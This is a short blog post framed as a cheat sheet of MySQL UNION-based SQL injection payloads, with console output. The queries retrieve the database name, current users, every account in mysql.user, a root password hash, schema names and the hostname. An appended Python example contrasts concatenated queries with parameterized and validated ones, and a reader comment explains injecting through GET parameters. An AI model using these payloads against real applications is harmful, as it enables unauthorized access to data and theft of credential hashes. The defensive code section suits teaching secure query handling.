MySQL Injection Cheat Codes

It’s been a crazy day. Since this is my first post on this blog, I thought of writing a little bit about cheat codes for SQL injection. SQL injection has been around for a very long time, yet people make the same mistakes when they develop applications. Alright, let's go through the codes.

Database

SELECT * FROM test WHERE id=-1 UNION SELECT database(),null,null limit 0,1--

Length of the database name

SELECT * FROM test WHERE id=1 and LENGTH(database())<10
SELECT * FROM test WHERE id=1 and LENGTH(database())=4

Users

SELECT * FROM test WHERE id=-1 UNION SELECT null,(select(user())),null --
SELECT * FROM test WHERE id=-1 UNION SELECT null,(select(current_user())),null --

Getting current user name

mysql> SELECT * FROM test WHERE id=-1 UNION SELECT 1,current_user(),3 --;
+----+----------------+-------+
| id | name           | title |
+----+----------------+-------+
|  1 | root@localhost | 3     |
+----+----------------+-------+
1 row in set (0.00 sec)

mysql> SELECT * FROM test WHERE id=-1 UNION SELECT null,(select group_concat(user) from mysql.user),null --;
+------+-------------------------------------------------+-------+
| id   | name                                            | title |
+------+-------------------------------------------------+-------+
| NULL | root,debian-sys-maint,phpmyadmin,root,test,root | NULL  |
+------+-------------------------------------------------+-------+
1 row in set (0.03 sec)

Getting user host and password hash from the user table in the mysql database

mysql> SELECT * FROM test WHERE id=-1 UNION SELECT null,(select concat(host,user,password) from mysql.user limit 0,1),null --;
+------+--------------------------------------------------------+-------+
| id   | name                                                   | title |
+------+--------------------------------------------------------+-------+
| NULL | localhostroot*4DCF17E4A473BC86597EAC5225CBA80E11123CB2 | NULL  |
+------+--------------------------------------------------------+-------+
1 row in set (0.00 sec)

Database List

mysql> SELECT * FROM test WHERE id=-1 UNION SELECT 1,schema_name,3 FROM information_schema.schemata limit 0,1--;
+----+--------------------+-------+
| id | name               | title |
+----+--------------------+-------+
|  1 | information_schema | 3     |
+----+--------------------+-------+

Hostname

mysql> SELECT * FROM test WHERE id=-1 UNION SELECT null,@@hostname,null;
+------+------------------+-------+
| id   | name             | title |
+------+------------------+-------+
| NULL | ubuntu-VADDW16FA | NULL  |
+------+------------------+-------+
1 row in set (0.01 sec)
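
Every query above has the shape SELECT * FROM test WHERE id=<request value>, which only exists when the application builds its SQL text by concatenation. The following is an added example, not code from the original post: it uses Python's sqlite3 as an offline stand-in for MySQL, a constructed test table, and sqlite_version() in place of current_user(), and shows the concatenated lookup beside a bound-parameter one.

```python
import sqlite3

# Same shape as the "current user" query above; sqlite_version() is a stand-in
# for MySQL's current_user() so the example runs without a MySQL server.
INJECTED = "-1 UNION SELECT 1,sqlite_version(),3 --"


def make_db():
    # Constructed sample data; columns mirror the id/name/title output above.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE test (id INTEGER PRIMARY KEY, name TEXT, title TEXT)")
    db.execute("INSERT INTO test VALUES (1, 'alice', 'editor')")
    return db


def lookup_vulnerable(db, raw_id):
    # The request value is pasted into the SQL text, so the database parses
    # it as SQL: a UNION in the value becomes a UNION in the statement.
    return db.execute("SELECT * FROM test WHERE id=" + raw_id).fetchall()


def lookup_parameterized(db, raw_id):
    # The placeholder sends the value separately from the statement; it is
    # only ever compared against id and can never become SQL syntax.
    return db.execute("SELECT * FROM test WHERE id=?", (raw_id,)).fetchall()


def lookup_validated(db, raw_id):
    # Defense in depth: an id must be plain ASCII digits. Reject anything
    # else before touching the database, then still bind the value.
    if not (raw_id.isascii() and raw_id.isdigit()):
        raise ValueError("id must be a non-negative integer")
    return db.execute("SELECT * FROM test WHERE id=?", (int(raw_id),)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("concatenated, id=1      :", lookup_vulnerable(db, "1"))
    print("concatenated, injected  :", lookup_vulnerable(db, INJECTED))
    print("parameterized, injected :", lookup_parameterized(db, INJECTED))
    try:
        lookup_validated(db, INJECTED)
    except ValueError as exc:
        print("validated, injected     : rejected:", exc)
```

With the concatenated lookup the injected value returns a row that was never in the table; with the bound parameter the same value matches nothing.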

2 thoughts on “MySQL Injection Cheat Codes”

    • Well, it depends, Bashir. I’ll make my explanation very simple for you. You know where you see GET requests in websites like http://example.com/index.php?id=1? The id parameter passes the value 1. In the PHP code the MySQL query should look like this: SELECT * FROM sometable where column_id=1. If it's insecure query handling, we might be able to do a SQL injection and do massive damage to the site.
